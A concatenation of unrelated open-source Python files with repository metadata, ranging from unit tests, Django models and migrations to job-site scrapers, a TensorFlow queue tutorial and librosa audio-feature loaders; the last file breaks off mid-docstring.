[
"wangzhengbo1204@gmail.com"
] |
wangzhengbo1204@gmail.com
|
cd6f6b1ab275a1d882c55fb188d3f83c804fcc16
|
dd25972910fcf2e636034130511f3e90e72279ab
|
/tests/test_utils.py
|
a68203afe83de59ce51e5ff9509f8c42cf3f7963
|
[
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"MIT"
] |
permissive
|
juju-solutions/jujubigdata
|
730919f25c86e0bca50c4d6e8fc31c08d56c68c8
|
c7a7d68feb6fd5a7661835ac2bcf178a39f3c7f2
|
refs/heads/master
| 2021-05-23T06:19:50.498529
| 2016-05-25T20:50:36
| 2016-05-25T20:50:36
| 35,439,404
| 2
| 6
|
Apache-2.0
| 2021-03-25T21:38:42
| 2015-05-11T17:37:55
|
Python
|
UTF-8
|
Python
| false
| false
| 4,155
|
py
|
#!/usr/bin/env python
# Copyright 2014-2015 Canonical Limited.
#
# This file is part of jujubigdata.
#
# jujubigdata is free software: you can redistribute it and/or modify
# it under the terms of the Apache License version 2.0.
#
# jujubigdata is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Apache License for more details.
import os
import tempfile
import unittest
import mock
from path import Path
from jujubigdata import utils
class TestError(RuntimeError):
pass
class TestUtils(unittest.TestCase):
def test_disable_firewall(self):
with mock.patch.object(utils, 'check_call') as check_call:
with utils.disable_firewall():
check_call.assert_called_once_with(['ufw', 'disable'])
check_call.assert_called_with(['ufw', 'enable'])
def test_disable_firewall_on_error(self):
with mock.patch.object(utils, 'check_call') as check_call:
try:
with utils.disable_firewall():
check_call.assert_called_once_with(['ufw', 'disable'])
raise TestError()
except TestError:
check_call.assert_called_with(['ufw', 'enable'])
def test_re_edit_in_place(self):
fd, filename = tempfile.mkstemp()
os.close(fd)
tmp_file = Path(filename)
try:
tmp_file.write_text('foo\nbar\nqux')
utils.re_edit_in_place(tmp_file, {
r'oo$': 'OO',
r'a': 'A',
r'^qux$': 'QUX',
})
self.assertEqual(tmp_file.text(), 'fOO\nbAr\nQUX')
finally:
tmp_file.remove()
def test_xmlpropmap_edit_in_place(self):
fd, filename = tempfile.mkstemp()
os.close(fd)
tmp_file = Path(filename)
try:
tmp_file.write_text(
'<?xml version="1.0"?>\n'
'<?xml-stylesheet type="text/xsl" href="configuration.xsl"?>\n'
'\n'
'<!-- Put site-specific property overrides in this file. -->\n'
'\n'
'<configuration>\n'
' <property>\n'
' <name>modify.me</name>\n'
' <value>1</value>\n'
' <description>Property to be modified</description>\n'
' </property>\n'
' <property>\n'
' <name>delete.me</name>\n'
' <value>None</value>\n'
' <description>Property to be removed</description>\n'
' </property>\n'
' <property>\n'
' <name>do.not.modify.me</name>\n'
' <value>0</value>\n'
' <description>Property to *not* be modified</description>\n'
' </property>\n'
'</configuration>')
with utils.xmlpropmap_edit_in_place(tmp_file) as props:
del props['delete.me']
props['modify.me'] = 'one'
props['add.me'] = 'NEW'
self.assertEqual(
tmp_file.text(),
'<?xml version="1.0" ?>\n'
'<configuration>\n'
' <property>\n'
' <name>modify.me</name>\n'
' <value>one</value>\n'
' <description>Property to be modified</description>\n'
' </property>\n'
' <property>\n'
' <name>do.not.modify.me</name>\n'
' <value>0</value>\n'
' <description>Property to *not* be modified</description>\n'
' </property>\n'
' <property>\n'
' <name>add.me</name>\n'
' <value>NEW</value>\n'
' </property>\n'
'</configuration>\n')
finally:
tmp_file.remove()
if __name__ == '__main__':
unittest.main()
|
[
"johnsca@gmail.com"
] |
johnsca@gmail.com
|
b2a162d9f9f162eb8a362eaa7d7226b8ba65b540
|
3ff4da2c4fbbf5310695d96bcf7f06a3fdf6d9f5
|
/Python/Edx_Course/Analytics in Python/Excercises/W4_Practice_2_dictionary_ingredients_preparation.py
|
b01b0498f77363b81daca9df1fba6b6bb27ef2a8
|
[] |
no_license
|
ivanromanv/manuales
|
cab14389161cbd3fb6a5d4e2d4e4851f8d1cda16
|
a296beb5052712ae3f03a3b492003bfc53d5cbba
|
refs/heads/master
| 2018-10-01T01:01:50.166637
| 2018-07-22T18:55:50
| 2018-07-22T18:55:50
| 106,485,581
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,026
|
py
|
# returns a dictionary containing the ingredients and preparation instructions
#
#
def get_recipe_info(recipe_link):
recipe_dict = dict()
import requests
from bs4 import BeautifulSoup
try:
response = requests.get(recipe_link)
if not response.status_code == 200:
return recipe_dict
result_page = BeautifulSoup(response.content,'lxml')
ingredient_list = list()
prep_steps_list = list()
for ingredient in result_page.find_all('li',class_='ingredient'):
ingredient_list.append(ingredient.get_text())
for prep_step in result_page.find_all('li',class_='preparation-step'):
prep_steps_list.append(prep_step.get_text().strip())
recipe_dict['ingredients'] = ingredient_list
recipe_dict['preparation'] = prep_steps_list
return recipe_dict
except:
return recipe_dict
recipe_link = "http://www.epicurious.com" + '/recipes/food/views/spicy-lemongrass-tofu-233844'
get_recipe_info(recipe_link)
|
[
"“ivanromanv@gmail”"
] |
“ivanromanv@gmail”
|
c38d930610a88fbfe78343ed1d9797eee7ac3150
|
be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1
|
/Gauss_v45r8/Gen/DecFiles/options/14165002.py
|
19933c4814bf463ca3508a791d21a537372aaacb
|
[] |
no_license
|
Sally27/backup_cmtuser_full
|
34782102ed23c6335c48650a6eaa901137355d00
|
8924bebb935b96d438ce85b384cfc132d9af90f6
|
refs/heads/master
| 2020-05-21T09:27:04.370765
| 2018-12-12T14:41:07
| 2018-12-12T14:41:07
| 185,989,173
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 815
|
py
|
# file /home/hep/ss4314/cmtuser/Gauss_v45r8/Gen/DecFiles/options/14165002.py generated: Fri, 27 Mar 2015 15:47:59
#
# Event Type: 14165002
#
# ASCII decay Descriptor: [B_c+ -> ([B_s0]nos -> (D_s- -> K+ K- pi-) pi+, [B_s0]os -> (D_s+ -> K+ K- pi+) pi-) pi+]cc
#
from Configurables import Generation
Generation().EventType = 14165002
Generation().SampleGenerationTool = "Special"
from Configurables import Special
Generation().addTool( Special )
Generation().Special.ProductionTool = "BcVegPyProduction"
Generation().PileUpTool = "FixedLuminosityForRareProcess"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bc_Bspi+_Dspi=BcVegPy,DecProdCut.dec"
Generation().Special.CutTool = "BcDaughtersInLHCb"
|
[
"slavomirastefkova@b2pcx39016.desy.de"
] |
slavomirastefkova@b2pcx39016.desy.de
|
c8602c38456724f4cf0ecdb69a254026ec4a2afc
|
2855f26e603ec7bf5b18876b54b75ee4577bdf2c
|
/bankrecon/migrations/0002_reconciliation_marker.py
|
bc25443b472d1f0c6d6130e214e29d0aa13b7ae3
|
[] |
no_license
|
zkenstein/ppob_multipay_v2
|
e8ea789c395c6fa5b83ba56fbaf5ea08a2a77a14
|
85296f925acf3e94cc371637805d454581391f6e
|
refs/heads/master
| 2022-03-04T13:53:30.893380
| 2019-11-16T22:49:50
| 2019-11-16T22:49:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 395
|
py
|
# Generated by Django 2.1.5 on 2019-04-16 16:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bankrecon', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='reconciliation',
name='marker',
field=models.TextField(blank=True, max_length=30),
),
]
|
[
"anderi.setiawan@gmail.com"
] |
anderi.setiawan@gmail.com
|
20188e1c1daf1aba8413510e021265f023defa6c
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/ke4FSMdG2XYxbGQny_24.py
|
6930f8ab144bbed9488241d9059899adbcd6d6d4
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 173
|
py
|
def even_odd_transform(lst, n):
for i in range(len(lst)):
for j in range(n):
if lst[i] %2==0 :
lst[i]-= 2
else :
lst[i]+= 2
return lst
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
521c0123282061359a18e1ed2fb872d8782cea5d
|
2dc12207547c3438421905aee1c506d427e0cbf1
|
/ch17-01-变量作用域.py
|
292464fb81bc78836df82ae8823bc6f238000a73
|
[] |
no_license
|
xmduhan/reading_notes__learning_python
|
8b61ea30be3fb50e1ad49764fcfc8bee8189f48e
|
3526f6b07cb2be799b2baddd7a2e3afef27e7b81
|
refs/heads/master
| 2020-05-17T16:26:23.624423
| 2014-06-15T04:43:38
| 2014-06-15T04:43:38
| 16,638,479
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 835
|
py
|
# -*- coding: utf-8 -*-
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
变量作用域
""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
#%% 可以是直接访问global数据
x = 1
def fun():
print(x) # 读取一个值
fun()
#%% 可以是直接访问global数据
x = 1
def fun():
y = x + 1 # 读取一个值
print 'y =', y
fun()
#%%
x = 1
def fun():
x = 2 # 无法使用x=2,修改全局变量
fun()
print "x =", x
#%%
x = 1
def fun():
global x
x = 2 # 指定了global x,所以x=2,可以修改全局变量
fun()
print 'x =' ,x
#%%
x = 1
def fun():
#import ch17-01 # 由于那个该死的"-"导致无法使用import语句导入模块
import sys
sys.modules['ch17-01']
|
[
"xmduhan@gmail.com"
] |
xmduhan@gmail.com
|
5d8cabc7d618696a371038fb7960237e18f85354
|
7bededcada9271d92f34da6dae7088f3faf61c02
|
/pypureclient/flasharray/FA_2_17/models/directory_space.py
|
181da14d597c49d1cb1260370a9839af5f77bbba
|
[
"BSD-2-Clause"
] |
permissive
|
PureStorage-OpenConnect/py-pure-client
|
a5348c6a153f8c809d6e3cf734d95d6946c5f659
|
7e3c3ec1d639fb004627e94d3d63a6fdc141ae1e
|
refs/heads/master
| 2023-09-04T10:59:03.009972
| 2023-08-25T07:40:41
| 2023-08-25T07:40:41
| 160,391,444
| 18
| 29
|
BSD-2-Clause
| 2023-09-08T09:08:30
| 2018-12-04T17:02:51
|
Python
|
UTF-8
|
Python
| false
| false
| 4,530
|
py
|
# coding: utf-8
"""
FlashArray REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: 2.17
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_17 import models
class DirectorySpace(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'space': 'Space',
'time': 'int'
}
attribute_map = {
'id': 'id',
'name': 'name',
'space': 'space',
'time': 'time'
}
required_args = {
}
def __init__(
self,
id=None, # type: str
name=None, # type: str
space=None, # type: models.Space
time=None, # type: int
):
"""
Keyword args:
id (str): A globally unique, system-generated ID. The ID cannot be modified and cannot refer to another resource.
name (str): A locally unique, system-generated name. The name cannot be modified.
space (Space): Displays size and space consumption information.
time (int): The timestamp of when the data was taken. Measured in milliseconds since the UNIX epoch.
"""
if id is not None:
self.id = id
if name is not None:
self.name = name
if space is not None:
self.space = space
if time is not None:
self.time = time
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `DirectorySpace`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def __getitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `DirectorySpace`".format(key))
return object.__getattribute__(self, key)
def __setitem__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `DirectorySpace`".format(key))
object.__setattr__(self, key, value)
def __delitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `DirectorySpace`".format(key))
object.__delattr__(self, key)
def keys(self):
return self.attribute_map.keys()
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(DirectorySpace, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DirectorySpace):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"noreply@github.com"
] |
PureStorage-OpenConnect.noreply@github.com
|
720de787bbd74071e10d2e644a9c055ed7813456
|
d2bb57efe62e1747a6ea2287da5c21fd18bfde02
|
/mayan/apps/documents/tests/test_setting_migrations.py
|
36906893232b807e0b2d006b9a929f1f5f38beb9
|
[
"Apache-2.0"
] |
permissive
|
O2Graphics/Mayan-EDMS
|
1bf602e17a6df014342433827a500863eaed2496
|
e11e6f47240f3c536764be66828dbe6428dceb41
|
refs/heads/master
| 2020-09-28T06:26:39.728748
| 2019-12-09T19:00:33
| 2019-12-09T19:00:33
| 226,711,506
| 0
| 0
|
NOASSERTION
| 2019-12-09T19:00:34
| 2019-12-08T18:21:06
| null |
UTF-8
|
Python
| false
| false
| 2,133
|
py
|
from __future__ import unicode_literals
from django.conf import settings
from django.utils.encoding import force_bytes
from mayan.apps.common.tests.base import BaseTestCase
from mayan.apps.common.tests.mixins import EnvironmentTestCaseMixin
from mayan.apps.smart_settings.classes import Setting
from mayan.apps.storage.utils import NamedTemporaryFile
from ..settings import (
setting_documentimagecache_storage_arguments,
setting_storage_backend_arguments
)
class DocumentSettingMigrationTestCase(EnvironmentTestCaseMixin, BaseTestCase):
def test_documents_storage_backend_arguments_0001(self):
test_value = {'location': 'test value'}
with NamedTemporaryFile() as file_object:
settings.CONFIGURATION_FILEPATH = file_object.name
file_object.write(
force_bytes(
'{}: {}'.format(
'DOCUMENTS_CACHE_STORAGE_BACKEND_ARGUMENTS',
'"{}"'.format(
Setting.serialize_value(value=test_value)
)
)
)
)
file_object.seek(0)
Setting._config_file_cache = None
self.assertEqual(
setting_documentimagecache_storage_arguments.value,
test_value
)
def test_documents_cache_storage_backend_arguments_0001(self):
test_value = {'location': 'test value'}
with NamedTemporaryFile() as file_object:
settings.CONFIGURATION_FILEPATH = file_object.name
file_object.write(
force_bytes(
'{}: {}'.format(
'DOCUMENTS_STORAGE_BACKEND_ARGUMENTS',
'"{}"'.format(
Setting.serialize_value(value=test_value)
)
)
)
)
file_object.seek(0)
Setting._config_file_cache = None
self.assertEqual(
setting_storage_backend_arguments.value,
test_value
)
|
[
"roberto.rosario@mayan-edms.com"
] |
roberto.rosario@mayan-edms.com
|
cfbcbb6c08a5180985b1d36858eed3a4722b30aa
|
fb2e7a15d2b0ab34cc47664a526640aa80441083
|
/try7.py
|
93f5ff0e9a63ab816b0d7441bd017dc63c7e993e
|
[] |
no_license
|
Jeonghwan-Yoo/python_practice
|
c7b4d19b1da589b12ec025f3ff5729407ee0ca26
|
c82e0308b4b3a227ddbd560cedecc49c036ef4c2
|
refs/heads/master
| 2020-07-27T00:12:33.139274
| 2019-09-16T13:26:49
| 2019-09-16T13:26:49
| 208,806,360
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 220
|
py
|
a=[1,2,3]
try:
a[5]=6
except (ZeroDivisionError,IndexError,TypeError):
print('ZeroDivisionError,IndexError or TypeError')
except:
print('undefined error')
else:
print('good')
finally:
print('necessarily executed')
|
[
"dwgbjdhks2@gmail.com"
] |
dwgbjdhks2@gmail.com
|
93b5dafce54315a1f6bba023be93717bd858afa6
|
95761ba9ca92c9bf68f3fb88524ee01ddba9b314
|
/api-web/src/www/application/modules/search/handlers.py
|
91e5c196d1bcf213917388cff3ae848ef577618a
|
[] |
no_license
|
duytran92-cse/nas-workboard
|
918adf4b976f04a13dc756f8dc32aecf397c6258
|
bebe7674a7c6e8a3776264f18a3b7ca6b417dc7e
|
refs/heads/master
| 2022-10-23T01:02:39.583449
| 2020-06-14T19:25:01
| 2020-06-14T19:25:01
| 272,268,882
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 984
|
py
|
from notasquare.urad_api import *
from application.models import *
from application import constants
from django.conf import settings
from django.db.models import Q
class Search(handlers.standard.GetHandler):
def get_data(self, data):
kw=str(data['keyword'])
result = {
'board': [],
'category': [],
'story': [],
'matches': 0,
}
for board in Board.objects.filter(name__icontains=kw):
record = {'name': board.name, 'id': board.id}
result['board'].append(record)
for category in BoardCategory.objects.filter(name__icontains=kw):
record = {'name': category.name, 'board_id': category.board.id, 'category_id': category.id}
result['category'].append(record)
for story in BoardStory.objects.filter(name__icontains=kw):
record = {'name': story.name, 'board_id': story.board.id, 'story_id': story.id}
result['story'].append(record)
result['matches'] = len(result['board']) + len(result['category']) + len(result['story'])
return result
|
[
"thanh.tran@etudiant.univ-lr.fr"
] |
thanh.tran@etudiant.univ-lr.fr
|
a4b36ef3012a4833e99a6ced7f53a024ab683991
|
77b94c318ee6014f6080aa34886b85aa47500992
|
/scraping/utils.py
|
c65ed994a3d7f8351d77613dd234a3d3fb7902c3
|
[] |
no_license
|
dm1tro69/rabota_find
|
472c8417784333806db22eb4bb9ef722f5df779d
|
d3b903478186c9fa7313f1fedfefe6b2fe069164
|
refs/heads/master
| 2020-09-06T20:11:23.468166
| 2019-11-06T21:00:16
| 2019-11-06T21:00:16
| 220,536,761
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,194
|
py
|
import codecs
import datetime
import requests
from bs4 import BeautifulSoup as BS
import time
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)'
' Chrome/76.0.3809.100 Safari/537.36'}
def djinni():
session = requests.Session()
base_url = 'https://djinni.co/jobs/?primary_keyword=Python&location=Киев'
domain = 'https://djinni.co'
jobs =[]
urls = []
urls.append(base_url)
urls.append(base_url + '&page=2')
#req = session.get(base_url, headers=headers)
for url in urls:
for url in urls:
time.sleep(2)
req = session.get(url, headers=headers)
if req.status_code == 200:
bsObj = BS(req.content, "html.parser")
li_list = bsObj.find_all('li', attrs={'class': 'list-jobs__item'})
for li in li_list:
div = li.find('div', attrs={'class': 'list-jobs__title'})
title = div.a.text
href = div.a['href']
short = 'No description'
# company = "No name"
descr = li.find('div', attrs={'class': 'list-jobs__description'})
if descr:
short = descr.p.text
jobs.append({'href': domain + href,
'title': title,
'descript': short,
'company': "No name"})
return jobs
def rabota():
session = requests.Session()
base_url = 'https://rabota.ua/zapros/python/%d0%ba%d0%b8%d0%b5%d0%b2?period=3&lastdate='
domain = 'https://rabota.ua'
jobs = []
urls = []
yesterday = datetime.date.today() - datetime.timedelta(1)
one_day_ago = yesterday.strftime('%d.%m.%Y')
base_url = base_url + one_day_ago
urls.append(base_url)
req = session.get(base_url, headers=headers)
if req.status_code == 200:
bsObj = BS(req.content, 'html.parser')
pagination = bsObj.find('dl', attrs={'id': 'ctl00_content_vacancyList_gridList_ctl23_pagerInnerTable'})
if pagination:
pages = pagination.find_all('a', attrs={'class': 'f-always-blue'})
for page in pages:
urls.append(domain + page['href'])
for url in urls:
time.sleep(2)
req = session.get(url, headers=headers)
if req.status_code == 200:
bsObj = BS(req.content, 'html.parser')
table = bsObj.find('table', attrs={'id': 'ctl00_content_vacancyList_gridList'})
if table:
tr_list = bsObj.find_all('tr', attrs={'id': True})
for tr in tr_list:
h3 = tr.find('h3', attrs={'class': 'f-vacancylist-vacancytitle'})
title = h3.a.text
href = h3.a['href']
short = 'No description'
company = 'No name'
logo = tr.find('p', attrs={'class': 'f-vacancylist-companyname'})
if logo:
company = logo.a.text
p = tr.find('p', attrs={'class': 'f-vacancylist-shortdescr'})
if p:
short = p.text
jobs.append({'href': domain + href,
'title': title,
'descript': short,
'company': company})
return jobs
def work():
base_url = 'https://www.work.ua/jobs-kyiv-python/'
session = requests.Session()
domain = 'https://www.work.ua'
jobs = []
urls = []
urls.append(base_url)
req = session.get(base_url, headers=headers)
if req.status_code == 200:
bsObj = BS(req.content, 'html.parser')
pagination = bsObj.find('ul', attrs={'class': 'pagination'})
if pagination:
pages = pagination.find_all('li', attrs={'class': False})
for page in pages:
urls.append(domain + page.a['href'])
for url in urls:
time.sleep(2)
req = session.get(url, headers=headers)
if req.status_code == 200:
bsObj = BS(req.content, 'html.parser')
div_list = bsObj.find_all('div', attrs={'class': 'job-link'})
for div in div_list:
title = div.find('h2')
href = title.a['href']
short = div.p.text
company = 'No name'
logo = div.find('img')
if logo:
company = logo['alt']
jobs.append({'href': domain + href,
'title': title.text,
'descript': short,
'company': company})
return jobs
def dou():
base_url = 'https://jobs.dou.ua/vacancies/?category=Python&city=%D0%9A%D0%B8%D0%B5%D0%B2'
session = requests.Session()
jobs = []
urls = []
urls.append(base_url)
req = session.get(base_url, headers=headers)
for url in urls:
time.sleep(2)
req = session.get(url, headers=headers)
if req.status_code == 200:
bsObj = BS(req.content, 'html.parser')
div = bsObj.find('div', attrs={'id': 'vacancyListId'})
if div:
li_list = div.find_all('li', attrs={'class': 'l-vacancy'})
for li in li_list:
a = div.find('a', attrs={'class': 'vt'})
title = a.text
href = a['href']
short = 'No description'
company = 'No name'
a_company = li.find('a', attrs={'class': 'company'})
if a_company:
company = a_company.text
descr = li.find('div', attrs={'class': 'sh-info'})
if descr:
short = descr.text
jobs.append({'href': href,
'title': title,
'descript': short,
'company': company})
return jobs
|
[
"dimolg22@gmail.com"
] |
dimolg22@gmail.com
|
c95b62caf60eaabd5548d4fd3d27c9f4b7bd46b8
|
ffb6d3055d80d3403591f027d71701d4527b139a
|
/ACM-Solution/BEENUMS.py
|
d78ba92b0956733ea134415d77456e0bc1e97785
|
[
"MIT"
] |
permissive
|
wasi0013/Python-CodeBase
|
811f71024e81699363c1cd3b93e59412f20e758d
|
4a7a36395162f68f84ded9085fa34cc7c9b19233
|
refs/heads/master
| 2020-12-24T21:01:38.893545
| 2016-04-26T15:13:36
| 2016-04-26T15:13:36
| 57,138,236
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 258
|
py
|
import sys
import math
while True:
a=int(input())
if a<0 : break
d= 9+ 12*(a-1)
r= math.sqrt(d)
if r*r ==d :
r-=3
if r%6==0:
print("Y")
else :
print("N")
else : print("N")
|
[
"wasi0013@gmail.com"
] |
wasi0013@gmail.com
|
0462a8a8229711aa4990eb67d187f7b2cb49d77c
|
fdedfbc1290016ae293edcc41df96d0a3fb8a99c
|
/tensorflow-tutorial/tf_imageprocess/tfqueue.py
|
28610c999e22b3f05a98c40c0cede9f3286b0e42
|
[] |
no_license
|
Hsingmin/machine-learning
|
5d798ff974429fccb84ad61b2f72f4bb375c80e3
|
a554d9c2324b5daf0dde4c78f4a9b6e6b630e413
|
refs/heads/master
| 2021-01-23T18:47:51.153195
| 2018-06-14T14:48:09
| 2018-06-14T14:48:09
| 102,808,183
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,029
|
py
|
# tfqueue.py -- Queue as one kind of node in tensorflow have its own status .
#
import tensorflow as tf
import numpy as np
import threading
import time
'''
# Create a FIFO queue that can store two elements of integer type at most .
q = tf.FIFOQueue(2, "int32")
# Initialize elements in queue with enqueue_many() function .
init = q.enqueue_many(([0, 10],))
# Pop the tail element into variable x with dequeue() function .
x = q.dequeue()
y = x + 1
# Push y into queue .
q_inc = q.enqueue([y])
with tf.Session() as sess:
# Run queue initialize operation .
init.run()
for _ in range(5):
# The whole process including popping x , increment and pushing
# will be executed when running q_inc .
v, _ = sess.run([x, q_inc])
print(v)
'''
'''
# Inter-threads communication with tf.Coordinator class .
# Thread quit when shoul_stop() returns True ,
# Notice the other threads quit by calling request_stop() function .
# Function running in thread .
def MyLoop(coord, worker_id):
# Judge whethear stop and print own worker_id .
while not coord.should_stop():
# Stop all threads randomly .
if np.random.rand() < 0.1:
print("Stop from id: %d\n" % worker_id, end="")
# Notice the other threads quit .
coord.request_stop()
else:
print("Working on id : %d\n" % worker_id, end="")
time.sleep(1)
# Create Coordination class .
coord = tf.train.Coordinator()
# Create 5 threads .
threads = [threading.Thread(target=MyLoop, args=(coord, i,)) for i in range(5)]
# Start all threads .
for t in threads:
t.start()
# Wait for all threads quiting .
coord.join(threads)
'''
# Create a fifo queue with 100 elements of real data type at most .
queue = tf.FIFOQueue(100, "float")
# Push operation to queue .
enqueue_op = queue.enqueue([tf.random_normal([1])])
# Create multiple threads to run enqueue operations .
# [enqueue_op]*5 starting 5 threads in which enqueue_op running .
qr = tf.train.QueueRunner(queue, [enqueue_op]*5)
# Add created QueueRunner into collection of Tensorflow Graph .
# In tf.train.add_queue_runner() , no collection specified , then
# add QueueRunner into tf.GraphKeys.QUEUE_RUNNERS collection defaultly .
tf.train.add_queue_runner(qr)
# Pop operation from queue .
out_tensor = queue.dequeue()
with tf.Session() as sess:
# Coordinate started threads using tf.train.Coordinator() .
coord = tf.train.Coordinator()
# Explictly calling tf.train.start_queue_runners() to start all
# threads when QueueRunner() used , otherwise program would wait
# forever when calling dequeue operation .
#
# tf.train.start_queue_runners() will start all QueueRunners in
# tf.GraphKeys.QUEUE_RUNNERS collection , because it can only
# start QueueRunners specified in tf.train.add_queue_runner() .
threads = tf.train.start_queue_runners(sess=sess, coord=coord)
# Get value popped from queue .
for _ in range(3):
print(sess.run(out_tensor)[0])
# Stop all threads with tf.train.Coordinator .
coord.request_stop()
coord.join(threads)
|
[
"alfred_bit@sina.cn"
] |
alfred_bit@sina.cn
|
cf687ec2adc2c5f5e262d3341fb5ff6157f9c7bf
|
3ae1409baed016cc9061ef98806ee7786300d8d2
|
/python_import/feature_handling.py
|
98d3e5bfbed1361706d6d46523872abc8630214b
|
[] |
no_license
|
zashin-AI/minsun
|
550e8b7650fab4e265d11aed186590cbd6df5587
|
144181b619e6716c584b9282adbf8aa4a9fe4fd9
|
refs/heads/master
| 2023-05-08T21:11:02.771058
| 2021-06-04T01:59:24
| 2021-06-04T01:59:24
| 352,831,635
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,368
|
py
|
import librosa
import numpy as np
import sklearn
import soundfile as sf
def load_data_mfcc(filepath, filename, labels):
'''
Args :
filepath : 파일 불러 올 경로
filename : 불러올 파일 확장자명 e.g. wav, flac....
labels : label 번호 (여자 0, 남자 : 1)
'''
count = 1
dataset = list()
label = list()
def normalize(x, axis = 0):
return sklearn.preprocessing.minmax_scale(x, axis = axis)
files = librosa.util.find_files(filepath, ext=[filename])
files = np.asarray(files)
for file in files:
y, sr = librosa.load(file, sr=22050, duration=1.0)
length = (len(y) / sr)
if length < 5.0 : pass
else:
mels = librosa.feature.mfcc(y, sr=sr)
mels = librosa.amplitude_to_db(mels, ref=np.max)
mels = normalize(mels, axis = 1)
dataset.append(mels)
label.append(labels)
print(str(count))
count+=1
if labels == 0:
out_name = 'female'
out_dir = 'c:/nmb/nmb_data/npy/'
np.save(
out_dir + out_name + '_mfcc_data.npy',
arr = dataset
)
np.save(
out_dir + out_name + '_mfcc_label.npy',
arr = label
)
elif labels == 1:
out_name = 'male'
out_dir = 'c:/nmb/nmb_data/npy/'
np.save(
out_dir + out_name + '_mfcc_data.npy',
arr = dataset
)
np.save(
out_dir + out_name + '_mfcc_label.npy',
arr = label
)
data = np.load(
out_dir + out_name + '_mfcc_data.npy'
)
lab = np.load(
out_dir + out_name + '_mfcc_label.npy'
)
return data, lab
##########################################################################################
def load_data_mel(filepath, filename, labels):
'''
Args :
filepath : 파일 불러 올 경로
filename : 불러올 파일 확장자명 e.g. wav, flac....
labels : label 번호 (여자 0, 남자 : 1)
'''
count = 1
dataset = list()
label = list()
def normalize(x, axis=0):
return sklearn.preprocessing.minmax_scale(x, axis=axis)
files = librosa.util.find_files(filepath, ext=[filename])
files = np.asarray(files)
for file in files:
y, sr = librosa.load(file, sr=22050, duration=10.0)
length = (len(y) / sr)
if length < 10.0 : pass
else:
mels = librosa.feature.melspectrogram(y, sr=sr, n_fft=512, hop_length=128)
mels = librosa.amplitude_to_db(mels, ref=np.max)
dataset.append(mels)
label.append(labels)
print(str(count))
count+=1
if labels == 0:
out_name = 'female'
out_dir = 'c:/nmb/nmb_data/npy/'
np.save(
out_dir + out_name + '_mel_data.npy',
arr = dataset
)
np.save(
out_dir + out_name + '_mel_label.npy',
arr = label
)
elif labels == 1:
out_name = 'male'
out_dir = 'c:/nmb/nmb_data/npy/'
np.save(
out_dir + out_name + '_mel_data.npy',
arr = dataset
)
np.save(
out_dir + out_name + '_mel_label.npy',
arr = label
)
data = np.load(
out_dir + out_name + '_mel_data.npy'
)
lab = np.load(
out_dir + out_name + '_mel_label.npy'
)
return data, lab
####################################################################################
# 노이즈 제거 파일
def load_data_denoise_mel(filepath, filename, labels):
    '''
    Build a mel-spectrogram dataset from denoised audio and cache it as .npy.

    Args :
